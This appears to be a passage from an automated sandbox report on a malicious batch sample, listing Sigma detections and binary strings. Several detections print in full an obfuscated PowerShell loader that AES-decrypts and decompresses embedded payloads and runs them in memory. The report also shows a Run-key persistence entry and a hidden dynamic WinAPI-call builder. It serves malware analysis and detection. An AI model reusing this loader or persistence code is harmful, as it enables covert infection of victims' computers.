cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'
Sigma detected: Potential WinAPI Calls Via CommandLine
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4828, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 4556, ProcessName: schtasks.exe
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Sigma detected: Powerup Write Hijack DLL
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Sigma detected: Powershell Execute Batch Script
Source: Script Block LoggingAuthor: frack113: Data: EventID: 4104, MessageNumber: 1, MessageTotal: 1, Path: , ScriptBlockId: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, ScriptBlockText: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , Source: Microsoft-Windows-PowerShell, data0: 1, data1: 1, data2: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , data3: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, data4:
Sigma detected: Suspicious Powershell In Registry Run Keys
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2844, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6332, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 1284, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 1.cmdVirustotal: Detection: 14%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,
Source: Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
